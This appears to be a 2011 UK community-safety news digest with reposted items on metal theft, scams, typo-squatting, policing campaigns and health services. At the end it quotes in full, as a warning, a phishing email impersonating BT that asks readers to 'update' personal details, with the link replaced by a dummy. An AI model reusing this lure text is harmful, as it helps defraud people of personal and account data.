www.bbc.co.uk

People leaving home for Christmas have been warned to check their pipes which could be at risk of freezing and bursting.

London Fire Brigade (LFB) said there was a direct link between temperatures dropping below zero and an increase in the number of flooding incidents.

The service said the most common cause was pipes freezing, which caused water to expand and pipes to burst.

Last winter, London fire crews dealt with 2,600 floods in people's homes.

On 18 December when the average temperature across the country hit -1C, firefighters were attending, on average, one flooded house every 12 minutes, London Fire Brigade said.

'Ready to respond'
 
Jim Knighton, LFB's assistant commissioner for operational procedures, said as many people would be leaving their homes to visit family, people needed to make sure their pipes were in good shape.

"Frozen pipes can cause devastating damage to people's properties and possessions," he said.

"Our firefighters are ready to respond to any flooding call outs we get but by that stage it's often too late and the damage has been done."

The brigade has four specialist flood response kits, each of which contains rigid flood rescue boats and paddles and rigid floating pontoons, which can be used to make bridges and walkways to rescue people.

Six high volume pumps, which can be used to pump large amounts of water away from flooded areas, are stationed at strategic locations across the city.

(22nd December 2011)


 

CLUBBERS TARGETED IN WIFI INFO OPERATION
(Police Oracle, dated 16th December 2011 author Cliff Caswell)
www.policeoracle.com [Note 1]

Police in London have been using a unique initiative to help partygoers stay safe in the night time economy- by urging them to turn on the Wi-Fi option on their phone.

In the first campaign of its kind launched by the Met's Op Sapphire, the technology is being used in bars and clubs to help deliver rape prevention and personal safety messages.

As well as targeting potential offenders by telling them that having sex with somebody who does not have the ability to consent could end in a rape charge, other messages are giving advice to people to drink responsibly and stay safe.

Officers are focusing the initiative around popular venues within the boroughs of Westminster, Camden, Southwark and Lambeth - including Ministry of Sound, Proud Galleries, The Trocedero Centre and Infernos nightclub.

Posters inviting clubbers to switch on their Wi-Fi have been put up around the venues and alerts are sent to phones with an invitation to download a police message.

Op Sapphire spokesman Det Supt Jason Ashwood said: "This concerted prevention drive is about sending a message to perpetrators of rape that sex with someone who is unable to consent is rape. If a person is unconscious or their judgement is impaired by alcohol they are legally unable to consent.

"This is about us trying to prevent offences from happening. I do however want to make something very clear - the only person ever responsible for a rape is the perpetrator."

In addition to the Wi-Fi initiative, Safer Neighbourhoods Teams, PCSOs and Safer Transport officers are being deployed at venues to hand out leaflets about the initiative.

They are also on hand to provide advice about safety in the night time economy.

(22nd December 2011)

 


 

POLICE METAL THEFT UNIT LAUNCHES IN BEXLEY
(BBC News, dated 19th December 2011)
www.bbc.co.uk

Scotland Yard is launching its first dedicated unit to tackle the growing problem of metal theft.

The crime is believed to cost the economy around £700m a year.

The Waste and Metal Theft Taskforce is based in Bexley, south-east London, one of the boroughs most severely affected because of the high number of scrap metal yards.

The police and the Government last week announced a crackdown to curb the metal theft crisis.

The taskforce includes experts from BT and the local authority's environmental crime unit; it will also advise other boroughs, particularly areas with high numbers of scrap metal yards.

British Transport Police (BTP) said it regards cable theft second only to terrorism in its list of priorities, and a newly formed cross-ministerial group has met several times to discuss the problem.

Operation Ferrous
 
In the first two weeks of December officers carried out 275 inspections and searches of scrap dealer yards.

Fifteen people were arrested for offences ranging from burglary to transporting waste metal illegally without a licence'

Sixteen vehicles were seized as part of Operation Ferrous.

Chief Supt David Chinchen, the Met's lead for Operation Ferrous, said: "Metal theft is not a victimless crime but is causing increasing misery to commuters and householders, and costing millions to the rail industry and local authorities.

"Our latest operation aimed to identify, disrupt and deter those involved in this illegal trade, and acted as an important intelligence-gathering exercise for future operations so that we can target those evading the law and those who supply them even more effectively.

"We are keen to work with legitimate scrap metal dealers, but those who aren't can expect to see regular enforcement."

In one suspect's back garden they found charred remains in an oil-drum suggesting evidence of cable-burning - the process used by metal thieves to extract the lucrative copper from inside.

Regular operations
 
Officers also found one man hauling car metal parts on to the back of his truck, for transport to a scrap metal yard, who had been claiming incapacity benefit since 2008 for a broken leg, pelvis and shoulder.

Acting Insp James Coomber, operational lead for Bexley Waste and Metal Theft Taskforce, said: "Although the majority of scrap metal dealers are legitimate, those who are not are contributing to a thriving illegal trade which we are determined to clamp down on."

Deputy Mayor of London Richard Barnes said the strides Bexley had made with the launch of the taskforce, together with the efforts under the Met-wide Operation Ferrous, delivered "a forceful message to those intent on carrying out such malicious theft and sabotage that it will not be tolerated".


 

PART OF THE PROBLEM

SCRAP METAL THEFT ON SAME LEVEL AS DRUG SCENE (Extract)
(BBC News, dated 14th December 2011 author Tom Edwards)

Full Article : http://www.bbc.co.uk/news/uk-england-london-16163742

It shows for the first time the full scale of the problem for commuters in London and the South East although it's not the worst hit region.

How many hours of delays have been caused by metal theft?
2011 - 949 hours (40 days)

2010 - 237 hours (10 days)

2009 - 148 hours (six days)

That shows nearly a 700% increase in delays.

How much compensation has been paid out (to train companies) due to metal theft?

2011 - £3,608,892
2010 - £1,175,252
2009 - £373,799

That's nearly a 1,000% increase.

How many incidents of metal theft have there been?

2011 - 104
2010 - 71
2009 - 40

That's a 260% increase in incidents.

So what can the British Transport Police (BTP) do to try to stop this? The BTP is very clear that things need to change when it comes to legislation. Under the Scrap Metals Dealers Act (1964) they are allowed to enter scrapyards without warning.

The Act requires all scrap metal dealers to be registered with their local authority and obliges them to maintain records of all transactions relating to scrap metal received and processed. The penalties imposed for failure to comply are fixed fines. The fines are simply not high enough to deter someone who is currently able to get a very good price for scrap metal.


(22nd December 2011)


 

EVERY DEATH ON EVERY ROAD IN GREAT BRITAIN 1999 - 2010
(BBC News website)

Full Article : www.bbc.co.uk/news/uk-15975720

Note : The full article contains access to the data for the 36,371 people who were killed, via Postcode.

Britain has one of the best records in the world for road casualties. However, hundreds still die on the roads every year. In 2010, the police recorded 1,850 deaths, 22,660 people seriously injured and 184,138 who received light injuries.

About the map: Using official data recorded by police in Great Britain between 1999 and 2010, we have plotted every road collision in which someone died. In all, 36,371 fatalities are marked on this interactive map. You will also find partial data for Northern Ireland, for 2004-2009.

How the data is gathered: Detailed information about each crash is recorded by the police at the scene. It is subsequently transferred onto a computer database. This is available to researchers from the Economic and Social Data Service.

Every time a road traffic collision is reported to the police in which someone is either injured or dies, the police record details of the incident on a special form, known as STATS19. The police record many details including when and exactly where the crash took place, in what weather, on what class of road and whether it was close to a junction, a school and so on. All of this data is collated every year. The Department for Transport releases quarterly headline figures based on this data and once a year, a full annual report.

The data comes from police records dated between 1999 and 2010. The information is recorded by police at the scene of a crash. The data is then transferred onto a computer database. As with any large collection of data, there will be some errors and duplicates in the information and these will appear on our map. In addition, the circumstances may have changed since the information was recorded or more accurate information may have come to light.

With regard to the missing incidents, there are 86 fatal collisions in the police data made available to us that have incomplete information. For this reason, we have been unable to include them in the map.

Missing data: As with any large collection of data, there will be errors and omissions. The BBC apologises for any distress or offence that may be caused by the inclusion of these errors.

(16th December 2011)




ITS MORE THAN TRAINS THAT ARE GETTING DELAYED, PATIENTS ARE AS WELL !

 

TRACKING DOWN LONDON'S METAL THEFT DEALERS
(BBC News, dated 14th December 2011 author Guy Lynn)

Full Article : www.bbc.co.uk/news/uk-16165179

Rogue scrap dealers willing to launder stolen metal in a trade worth millions of pounds, have been exposed in a BBC London investigation.

Figures obtained by BBC London reveal the scale of the effects of the illegal trade on rail commuters in London and the south east, with delays rising by 700% in the last three years.

Metal theft is a huge illicit business due to rising metal prices on world markets.

British Transport Police (BTP) have prioritised the problem as "second to terrorism" and there is mounting pressure to update legislation that is seen as outdated and ineffectual.

The Home Office is considering measures to tighten the regulation of scrapyards and a growing number of MPs are calling for a ban on cash transactions, which make it hard for police to track down stolen metal.

In 2009, Network Rail figures show rail operators in the South East suffered 148 hours of delays and were paid £373,799 in compensation as a direct result of metal thefts.


 

COPPER THIEVES HALT 100 HOSPITAL OPERATIONS AFTER STEALING POWER CABLES FROM GENERATOR
(Dailt Mail, dated 14th December 2011 author Like Salkeld)
www.dailymail.co.uk [Note 1]

A hospital was forced to cancel almost 100 operations yesterday after copper thieves stole cables used to keep a vital back-up power generator working.
Doctors put procedures on hold and will now have to carry out dozens of extra operations a day in the run up to Christmas following the raid of more than 300ft of copper wiring.
The Llandough Hospital, in South Wales, also faces costs running into many tens of thousands of pounds from lost equipment and wasted hours.

The stolen metal, meanwhile, is said to be worth just 'a few hundred pounds' in scrap.

The shocking theft is the latest in a series of metal theft raids across Britain, many of which are said to be putting lives at risk.
Organised gangs, cashing in on the surge in the price of copper, are knocking out crucial communications by stealing the copper cables the systems use, affecting emergency services and transport safety.

At Llandough, in Penarth, near Cardiff, the cancelled operations included treatment of eight cancer patients, two of whom are suffering from breast cancer.
Hospital bosses said the theft was 'dangerous and irresponsible' and confirmed that 81 patients were affected.

Back-up generators are crucial to hospitals because they guarantee life and death services remain running in a power cut.
And although the main generator was unaffected, South Wales has been experiencing stormy weather, and officials decided that they could not operate on patients without back-up in place.
A relative of an affected patient said of the theft: 'It's disgusting, I don't know how anyone would be cold-hearted enough to steal from a hospital. 'They are putting people's loved ones at risk for the sake of some scrap metal.' The theft at the 423-bed hospital, which specialises in cancer and orthopaedic treatment, but does not carry out emergency surgery, was discovered on Tuesday afternoon during a routine inspection.
A replacement back-up generator was fitted yesterday and last night a spokesman for the hospital confirmed that normal surgical activity would resume today.
Jan Williams, chief executive of the Cardiff and Vale University Health Board, said: 'NHS staff work tirelessly to care for some of the most vulnerable members of our communities 'It is depressing to note that, for these thieves, the monetary value of copper is of more consequence.'

Deputy chief executive Paul Hollard said: 'It beggars belief that anyone could stoop so low as to potentially put patients' lives at risk in this way.'
South Wales Police are investigating and have appealed for information from anyone offered the copper as scrap.
Last month, it was reported that thieves had stolen street lighting cabling, causing blackouts on major roads.  And coastguards' communications were cut off for 36 hours after aerial signals were cut by metal thieves. Thieves have also disrupted the radio system used by emergency services including the Metropolitan Police, fire and ambulance services.
Detective Sergeant Chris Hearn, of the British Transport Police metal task force, said: 'They are obviously endangering lives.'
The price of scrap copper and other metals, such as iron and aluminium, has soared as fast-expanding economies in the emerging world buy up huge quantities.

(15th December 2011)


 

SO YOU THINK YOU ARE AN ACCURATE TYPIST ?

Just rushing to type in an e-mail or website address may result you becoming a victim of fraud. Once you get to any website, if you are going to enter any form of personal information ensure that the "http" is replaced by an "https" and that a small padlock symbol appears somewhere on your screen.

The following two articles describe some examples of this type of fraud.

ID THEFT WARNIN OVER SPELLING MISTAKES ON EMAILS
(This is Money.co.uk, dated 14th September 2011 author Dan Hyde)

Full article [Note 1]  :

www.thisismoney.co.uk/money/article-2037376/Typo-squatting-ID-theft-warning-spelling-mistakes-emails.html

Just one mistake in an email can leave you vulnerable to fraud by cunning cyber-criminals, researchers have found.

Simply missing out the dot in the email address bar can see your messages intercepted by fraudsters in stealthy trick called 'typo squatting'.

In a six month investigation, two researches at security think Godai Group managed to intercept 120,000 wrongly-addressed emails that would otherwise have been lost in cyberspace.

The messages contained personal details, user names, passwords and other sensitive information.

The research follows an admission by Barclays that fraudsters stole £20,000 from two pensioners' current accounts by obtaining personal details.

The criminals used mysteriously-obtained security question answers to dupe the bank's call centre staff into changing the registered address for the two pensioners' accounts and then send out new debit cards. Barclays has reimbursed the customers since BBC Radio 4's Moneybox programme exposed the scam.

The Barclays con-job could easily have been kicked off using the sort of 'typo-squatting' techniques exposed by Godai Group's Peter Kim and Garrett Gee.

Simplest of crimes

The Researchers bought 30 domain names that were almost identical to those used at major US businesses like Microsoft, Nike, PepsiCo and Dell. They were identical but for one crucial difference - a missing dot. While many firms use web address such as companyname.com, many have 'subdomains' that use dots, such as us.companyname.com.
They snapped up 30 of these subdomains, known as 'doppelgangers' in IT circles. A hypothetical example might be ceo@uscompanyname.com, rather than the genuine address of "ceo@us.companyname.com". They then sat back and watched 20gigabytes of data fall into their laps over six months as, time and again, internet users omitted the dot from a private email.



CONSUMERS FACE "TYPO" NEGATIVES
(Metro, dated 13th December 2011)
www.metro.co.uk   [Note 1] 

Fraudsters are exploiting spelling errors made by online Christmas shoppers to steal bank details and sell them goods they will never receive.

"Typo-Squatters" have set up websites that pop up when customers misspell the names of high street retailers.

Security experts have found almost 2000 sites that mirror popular shopping sites such as Argos , Debenhams, and John Lewis to fool unsuspecting shoppers.

Even if users do not enter their personal information, the sites can infect their machines with bugs.

Typo-Squatting also puts companies confidential data at risk as many employees shop from work computers at lunchtime, said Elad Sharf, from Websense Security Labs.

(15th December 2011)


TRADING STANDARDS INSTITUTE WARNS OF DANGEROUS ENERGY SAVING SCAM TARGETING ELDERLY
(Trading Standards Institute, Press Release dated 1st December 2011)
www.tsi.org.uk

Distributed by : Metropolitan Police neighbourhood link (received 13th December 2011)

Trading Standards Institute is urging consumers to be aware of rogue telephone cold callers offering energy saving devices after trading standards up and down the country reported hundreds of complaints.

Trading standards are currently dealing with more than 200 complaints about people claiming to be their energy supplier or working in partnership with them, offering a plug in device which they say can save them 40 per cent off their energy bills.

Trading standards have had a number of the items tested which not only failed to satisfy electrical safety standards but do not deliver any tangible energy savings.

Ron Gainsford from the Trading Standards Institute said: "Consumers are warned not to use the product as they pose a risk of fire and electrocution and a safety recall has been issued for the items traced so far.
"Unscrupulous criminals are using the rising energy prices as an opportunity to lure in cash strapped consumers - elderly people seem to have been deliberately targeted. "The number of complaints we are currently dealing with is bound to be only the tip of the iceberg."

Westminster trading standards have been investigating the scam as the caller gives a London W1 Oxford Street address for the company. Sue Jones from Westminster trading standards said: "The address they give is that of a virtual office provider, the companies involved in these scams are not actually situated there - we believe the call centre they use is based abroad and the appliances appear to be distributed by a number of individuals in the UK. "We know that these fraudsters have been duping consumers across the country into paying £99 for the energy saving device and have been told the caller always appears to be very credible by already knowing the consumers' details, their energy supplier and sometimes some or all of the digits of their credit/ debit
card. "Often consumers do not realise that they have been defrauded until they receive the dodgy looking device with instructions in broken English and the accompanying invoice which names an unknown supplier and often gives an American address."

So far four different suppliers have been named, 1 Stop Marketing Solutions, ITC Development Corp, Power Saver and Athico Ltd. but the fraudsters could be operating under other names too. Some of these names could be very similar to genuine companies - for example Power Saver Ltd, based in Tonbridge, Kent is not involved in this fraud. The director of Athico Ltd appears to have been a victim of the scam himself. He fully cooperated with trading standards and the company has now ceased trading.

Advice to consumers

If consumers have responded to one of these cold calls they should report the matter to Action Fraud on www.actionfraud.org.uk 0300 123 2040 or Consumer Direct on 08454040506 . They should also contact their bank to stop their debit/ credit card. If a device has been received they should not use it and dispose of it carefully.
Consumers should be cautious about giving out any personal or financial information. They should independently verify a caller's identity before agreeing to purchase any goods or services.

(15th December 2011)


POLICE CHECK JUST ONE IN SEVEN FOREIGN CRIMINALS RECORDS, EVEN AFTER THEY ARE ARRESTED
(Daily Mail, dated 7th December 2011 author Jack Doyle)
www.dailymail.co.uk  [Note 1]

Police are failing to check the criminal histories of tens of thousands of foreign offenders - even after they are arrested in the UK. Officers request details from a suspect's home country in just one in seven investigations involving EU nationals, according to a Home Office review.
And each year, around 30,000 foreign offenders who pass through the courts do so without anyone knowing the full extent of their criminal past.

Judges are therefore unaware if the offender they are sentencing is a convicted rapist, murderer or paedophile - or someone with no criminal history at all.
In the worst cases, it could mean the alert is not sounded when dangerous offenders wanted on the continent are picked up in Britain. Without information on their criminal past, an offender could face a much shorter sentence, be bailed even though they present a threat to the public or escape deportation.

Details of the way officers are failing to carry out even basic checks emerged in a Home Office review of criminal records systems.
Sunita Mason, the independent advisor on criminal records in England and Wales, said: 'It is clear that we should be  making such checks routinely when EU nationals are arrested and charged.
'Even minor offending in the UK might lead to the disclosure of much more serious offending overseas.'
Under EU data-sharing rules, officers can ask to see the records of any EU nationals they arrest.

Of the 35,000 EU nationals charged with criminal offences in England and Wales last  year, checks were ordered on just 5,500.
A similar proportion - 15 per cent - of the EU nationals arrested in this country had their criminal histories explored.
Astonishingly, police may not even be aware they can request the records, the report found. Miss Mason also warned funding for the UK body which handles requests to foreign forces is in doubt.  She said: 'To not address this issue is a potentially huge public protection risk.'

The same report showed EU countries alerted the UK to 20,000 Britons convicted of crimes overseas. That includes 450 Britons convicted of serious violent or sexual offences and 276 criminals who committed offences against children. Just 37 were already known to the UK authorities.
The Association of Chief Police Officers said many offenders refused to say where they were from or lied about their nationality, making it difficult for officers to find out about their past.
The 'free movement' directive means it is virtually impossible to stop EU citizens with criminal convictions from entering Britain. Even in cases where officials are aware of serious convictions, criminals cannot automatically be turned away.

Regulations say they can be barred to maintain public security, but 'convictions in themselves do not constitute grounds for taking such measures'.
In reality, they allow all but the very worst criminals free access to the UK.
Just two weeks ago a Latvian axe-killer was jailed after running down an innocent woman while drink-driving.
Police had no idea Intars Pless, 34, was a convicted murderer and living in the UK until February this year when he ran his car straight into moped rider Valentina Planciunene, who died on the road.
A Home Office spokesman said: 'It is an operational matter for police to decide when  to request information on foreign nationals.
'The UK worked hard to implement an EU-wide agreement to share this information - but we know all countries do not currently comply fully.'That is why it is important that the new European legislation implemented next spring will require member-states to share this information.'

(15th December 2011)


 

WELCOME TO ENFIELD

If you are looking for shops; you will be pleasantly suprised by the range in Enfield Town. If you are after supermarkets there are 3 just off of the A10; along with a JB Sports, Toys R Us, Comets, Halfords, Argos and PC World / Currys. All of these are within the Southbury Ward of the London Borough of Enfield.

Along with this excellent shopping if you happen to be driving illegally within the area you may also experience the long arm of the law. For example during the month of November the Safer Neighbourhood Team had the following results.

 
108 vehicles were stopped and the drivers received a variety of points. Of the 108, the breakdown is as follows :

56 x speeding  = 3 penalty points and £60- fine.
22 x using handheld mobile phone whilst driving = 3 penalty points and £60- fine.
15 x No Insurance, 6 penalty points and £200- fine.
7 x Driving not in accordance with a licence, 3 penalty points and £60- fine.
4 x Contravening no entry signs, 3 penalty points and £60- fine.
2 x Contravening red traffic lights, 3 penalty points and £60- fine.
1 x overtaking on zebra crossing, 3 penalty points and £60- fine.
1 x driving without due care and attention, processed to court and if convicted, likely to receive 6 penalty points.

In addition

- Twenty vehicles were seized as part of Operation reclaim. 
- Nineteen drivers peeled off their illegal tints rather than accepting 3 penalty points and £60- fine.
- Six drivers were issued tickets for not wearing a seatbelt, £60- fine.
- Two drivers were issued tickets for having illegal number plates, £60- fine.
- Three robbery arrests were made when the Police Officers were enroute to do some work when a robbery took place nearby. The stolen property was recovered and one of the 3 youths arrested was also arrested for a robbery the day before.
- Two males were stopped on separate days and were both arrested for Unauthorised taking of a motor vehicle.

HAVE A MERRY CHRISTMAS AND DON'T DRINK AND DRIVE......TAKE A LICENSED TAXI !

(11th December 2011)




BRITISH RED CROSS LAUNCHES FREE FIRST AID APP
( British Red Cross website, dated 8th December 2011)
www.redcross.org.uk

 

The British Red Cross will empower smartphone users worldwide to act in an emergency, with the launch of its new mobile app.

The Red Cross' free app features simple, easy-to-understand advice on 18 everyday first aid scenarios, as well as tips on how to prepare for emergencies, from severe winter weather to road traffic accidents.

Joe Mulligan, head of first aid education aid, said: "If a friend or family member had a heart attack or choked, would you know how to help them? With this mobile app anyone can have life-saving skills at their fingertips. It revolutionises the way we learn first aid."

Available for Apple, Android and Blackberry, the app includes videos, interactive quizzes and simple step-by-step advice. The information is all hosted on the app itself, meaning no internet connection is needed, making it fast and easy to access.

An essential app for your smartphone

In user testing, the app has been described as "fun", "important" and "impressive", and been greeted with exclamations of "I can't believe it's free" and "when can I get this on my phone?" The answer is now. Be one of the first to get this essential app on your smart phone and don't forget to tell your friends and family about it too - by sharing this app, you can help save lives.

The Apple and Android version are available to download now and the BlackBerry version will follow in a few days time.

First Aid at your fingertips

If a friend or family member was having a heart attack or was choking, would you know how to help them? The free app features simple, easy advice on 18 everyday first aid scenarios, as well as tips on how to prepare for emergencies, from severe winter weather to road traffic accidents.

With videos, interactive quizzes and simple step-by-step advice, it's never been easier to learn first aid.

The information you need is all hosted on the app itself, meaning no internet connection is needed, making it fast and easy to access. Best of all, it's free. Get this essential app on your smartphone now.

For details of the download

http://www.redcross.org.uk/What-we-do/First-aid/Mobile-app

(11th December 2011)


 

STALKER TREATMENT CENTRE LAUNCHED
(BBC News, dated 8th December 2011)
www.bbc.co.uk
A new medical service for England and Wales specialising in treating stalkers is due to be launched.

The National Stalking Clinic is believed to be the first of its kind in the world.

According to the British Crime Survey one-in-five women and one-in-10 men aged 16 or over have been victims of stalking in its various guises.

BBC home affairs correspondent Danny Shaw said until now stalkers were prosecuted but not treated.

Dr Frank Farnham, a consultant psychiatrist who has helped set up the new service, said: "If we can treat stalkers, then we can save lives. "There is great need for a co-ordinated national service that can provide specialist advice and treatment. "The psychological impact on victims is corrosive, with many suffering months and, in some cases, years of harassment leading to a variety of illnesses including anxiety, depression and post-traumatic stress.

'Mentally draining'
 
"Victims live in a permanent state of hyper-alertness which is physically and mentally draining."

Our correspondent said offenders who made unwanted phone calls, sent unsolicited emails, followed or harassed the objects of their affections were usually subject to restraining orders. But under the new approach courts will be able to refer stalkers for assessment, treatment and rehabilitation. They will be dealt with by a team of medical experts based at Chase Farm Hospital in Enfield, north London.

Doctors running the service say an 18-month course of treatment will cost up to £10,000 but they claim it will be cheaper and more effective than a short prison sentence. But Dr Farnham said a typical assessment could cost between £1,500 and £2,000 and would be paid for by the court which sentenced the individual.

'Devastating'
 
Alexis Bowater, chief executive of UK charity Network for Surviving Stalking, said: "The launch of this clinic is a groundbreaking move and makes the UK one of the world leaders in tackling this devastating crime.

"The treatment and rehabilitation of stalkers is vital if we are to stop lives being lost to stalking."

Home Office minister Lynne Featherstone said: "I'm pleased to support the launch of this unique clinic that aims to prevent stalkers from reoffending.

"I've made stalking one of my priorities and it's included in the government's report Call To End Violence Against Women and Girls.

"We're also asking people for their views on how the police should tackle this devastating crime and whether current laws are adequate," she added.

(11th December 2011)


 

UK BORDER STAFF IN ARREST THREAT OVER "LILLE LOOPHOLE"
(BBC News, dated 8th December 2011 author Simon Cox)
www.bbc.co.uk

British border staff have faced threats of arrest by Belgian police for trying to stop people exploiting a loophole allowing them to enter the UK without passport checks, the BBC has learned.

Passengers can travel from Brussels to Lille without showing passports as Belgium and France are both within the Schengen area. But they can then stay on the train to the UK as there are no further checks. The Home Office confirmed it was working to tackle the "Lille loophole".

Leaked emails
 
The Schengen agreement allows passport-free travel between some European countries, but the UK is not a signatory.

Passengers with tickets from Brussels to Lille can board the train to London without showing a passport, but no-one checks whether passengers actually get off the train at Lille and UK Border staff do not perform checks on board. So passengers can continue on to London St Pancras, without going through further passport control, and illegally enter the country.

Radio 4's The Report has seen internal UK Border Agency (UKBA) correspondence highlighting the loophole, and the threats being made to staff trying to tackle it.

One UKBA officer describes an incident in April at a Brussels station where he stopped two Iranians who he said "bore all the hallmarks of Lille loopholers". After they were questioned the Belgian police intervened.

One officer shouted: "This has got to stop. You are not in Britain now, you are in Schengen. If they make a complaint you will be arrested."

The BBC has seen other emails describing clashes this year between UK Border Agency staff and Belgian federal police.

This led one officer to warn that many staff he had spoken to were so scared of being arrested by the Belgian police that they "will now turn a blind eye to potential Lille loopholers".

The issue has been discussed at the highest levels of the UK Border Agency and the Foreign and Commonwealth Office.

An email from a senior director to staff in May this year stated that the British Ambassador to Belgium had "voiced UKBA concerns on border controls for Lille passengers" to the Belgian immigration minister.

The Home Office minister Damian Green confirmed that both he and the Home Secretary Theresa May are aware of the loophole.

"Any loophole in our border defences is a matter of concern," he told The Report.

"It's one of those things that the British government can't solve on its own… that has to be solved in negotiations, and that's what we're now doing."

He added: "There are strict British immigration controls in place in France and Belgium and we have UK Border Agency officers based at St Pancras to target those we believe are intent on entering Britain illegally.

"We are currently working closely with our Belgian counterparts and Eurostar to resolve this as quickly as possible."

The government could not say when the loophole will be closed or how many people had exploited it.

The chairman of the Home Affairs select committee Keith Vaz told the BBC he was "astonished" by news of the loophole, and by the government's response to it.

"The minister is taking what appears to be a very casual approach to this very serious issue," he said.

He said he would question Jonathan Sedgwick, the acting chief executive of the UK Border Agency, about the matter when he appears before the select committee later.

"If a simple railway ticket can give you entry into the UK, this is a cause for real concern," he added.

Schengen Area Agreement

http://europa.eu/legislation_summaries/justice_freedom_security/free_movement_of_persons_asylum_immigration/l33020_en.htm

(11th November 2011)


 

WEBSITE TO MONITOR GPs IN LONDON LAUNCHED
(BBC News, dated 8th December 2011)
www.bbc.co.uk

Residents in London will now be able to see how well their local GP is doing as a website which monitors doctors' performances is launched.

The My Health London website will show GP standards such as screening rates and patient approval scores.

NHS London said the project was aimed at improving GPs' services.

The British Medical Association (BMA) said the information was meaningless without an understanding of the demographics the GP practice works in.

NHS London said it hoped the website would "create an information hub that would constantly be developed like an online newspaper focusing on health issues for Londoners".

It said it would help residents find out how their practice performs against standards such as childhood immunisations and cervical screening as well as how they compare to other GP practices.

'Informed decisions'
 
Dr Phil Koczan, a GP based in Chingford, north-east London, said as healthcare needs vary widely across London, it was hoped that GPs would learn from colleagues in other practices.

Each practice will have its own webpage which can be customised to keep people informed of clinics and services and it will also enable patients to provide feedback.

If the London trial is successful, it will then be rolled out across the rest of England and Wales.

Dr Richard Vautrey, deputy chair of the BMA's GP committee, said information about GP practices such as referrals and prescribing information was already publicly available, however it is not collated together or easily accessible.

He said the problem with the information was unless people understood an area the practice worked in, then the prevalence of certain diseases could differ markedly according to the lifestyle and occupation of the local population.

"We would therefore be very concerned if this information was used to create league tables that would mislead patients rather than better inform them," he said.

Mayor of London Boris Johnson is backing the project.

Ahead of its official launch, he said: "Few decisions are as critical as those affecting our health and that of our family and friends.

"To make informed decisions, it is of paramount importance that we are armed with sensible information."

My Health London website : www.myhealth.london.nhs.uk

(11th December 2011)


 

DRINK-DRIVE :CAUGHT TO COURT IN NINETY MINUTES
(Kent Police, dated 2nd December 2011)
www.kent.police.uk

People caught drink driving in Kent could lose their licence within hours of sobering up.

Kent Police will be using virtual court technology to put those charged with driving under the influence of alcohol or drugs before magistrates immediately. This means that people risk losing their licence on the day they are charged.

The announcement comes as Kent Police launches its seasonal road safety campaign to deter people from drink driving. Officers will be taking a zero tolerance stance on those who are found to be over the limit.

Once charged, the motorist will appear in front of a magistrate, often via the virtual court video link. If they are found to be guilty then the magistrate has the power to ban the defendant from driving. This takes immediate effect.

The use of virtual courts was trialled as part of the drink-drive crackdown last year (1 December 2010 to 1 January 2011) with 17 people appearing before a magistrate via the high tech video network. In one case a motorist was banned from driving no less than 90 minutes after being charged with driving under the influence of drink.

DCC Alan Pughsley explains: "Usually motorists will be charged with drink driving and be bailed to appear before the court some weeks later. This means until a guilty verdict is reached they are free to drive.

"The use of the virtual court system means that the defendant risks losing their licence on the day of charge."

As the party season begins officers will be conducting stop checks, targeting those who may be driving under the influence of alcohol or drugs. The checks will also involve examining the safety of the vehicle and ensuring any passengers are wearing seatbelts.

DCC Pughsley continued: "Our message is simple, if you are driving, stay sober and alert - or risk losing your licence.

"Before getting behind the wheel ask yourself 'is it worth it?' The consequences of drink driving are severe. You could kill yourself or an innocent party, you risk losing your job and your reputation.

"Driving under the influence of alcohol or drugs is selfish and anti-social. In addition to being banned from driving you could receive a criminal record and a fine of up to £5,000."

Kent Police is advising people to carefully plan their journeys and book a taxi, use a designated driver or public transport if you are going to drink. It is recommended that if you are driving you refrain from drinking any alcohol at all and people are asked to think about medication they may be on.

Some prescription drugs can increase the danger of a collision if you have been drinking even the smallest amount of alcohol.

DCC Pughsley added: "Around two people are killed in collisions on Kent's roads each week. Of these, statistics show that one in six of those deaths involve someone driving under the influence of drink or drugs. I would like to urge people to think about their actions, stay safe and be responsible."

The campaign will run from 1 December 2011 to 1 January 2012.

(6th December 2011)


 

LAUNCH OF ANTI-WEAPONS CAMPAIGN
(Courtesy of : Metropolitan Police, dated 5th December 2011)
www.met.police.uk

Young people at risk of getting caught up in violence are being urged by the Metropolitan Police Service (MPS) to visit YouTube to watch a powerful interactive film that sets out the consequences of carrying weapons.

The film 'Choose a Different Ending' is the centre of our launch for the latest anti-weapons campaign, which also features advertisements on targeted TV channels and radio stations, as well as a range of carefully chosen digital platforms. 

The campaign has been running since Monday 21 November with the film unbranded on YouTube and with search mechanisms on MSN Messenger, Hotmail, Facebook and other channels. Officers on boroughs who work in schools have also been supplied with a range of posters and postcards for distribution to pupils. 

The campaign will run for a total of five weeks, until Saturday 24 December.

The film asks viewers to make decisions in relation to various scenarios relating to knife crime and what outcome their decisions have.

It aims is to encourage the target audience (13-15-year olds) to learn more about the danger carrying a weapon can put them in and to increase public confidence and understanding of our work in tackling serious youth violence. 

Although the vast majority of young people are not involved in criminal activity, we are determined to continue to relentlessly target the small minority who do carry or use weapons.

The MPS Operation Connect Unit is also involved in tackling gang-fuelled violence through enforcement and intervention, working with local statutory and voluntary partners to help those who do want to exit the gang violence. 

Commander Steve Rodhouse, lead for the MPS on serious youth violence, said: "The Met's anti-weapons advertising campaign uses a hard-hitting interactive film to help teenagers realise they can make a positive choice to avoid getting involved in youth violence. 

"Young people who carry weapons often tell us it's for their own protection - but the harsh reality is that picking up a knife or gun puts them more at risk of injury and death. 

"Reducing youth and gang-fuelled violence is one of the Met's top priorities - but others need to play their part in tackling this complex problem. Parents and carers of young people need to be wise to where they are, who they are with and if there are any knives missing from home.

"We want to hear from anyone with information about the carrying and use of weapons on our streets, and I would urge young people to search online for 'Choose a Different Ending' to find out more."

(6th December 2011)




MORE NEWS FROM MY SPAM INBOX ! - NEW SPAM OR PHISHING METHOD
Category : phishing

 

I am taking this opportunity to warn you of this new spam / phishing method using the communications company "BT" as its medium. I personally haven't seen its like  before. In the actual e-mail the link appears as a bt website (ie. www.bt.com/etc) [Note 1], but the directional coding behind that link directs the user to another website.
The following is the complete wording from the e-mail, but the link has been changed. Note also that BT logos were also include.

Title : Account Information
From : BT Services <
bt@btservices.com>

Dear Customer,

This e-mail has been sent to you by BT to inform you that we were unable to update your account information. This might be due to either of the following reasons:

1. A recent change in your personal details. (eg: Address, phone number)
2. Submitting incorrect information during verification process.

Due to this, to ensure that your service is not interrupted, we request you to confirm and update your personal information today by visiting here: http://www.bogus.bt.con/xxx.xxx.xxx

If you have already confirmed your details then please disregard this message as we are processing the changes you have made.

Regards,

BT
Service Department
Thanks for your co-operation.

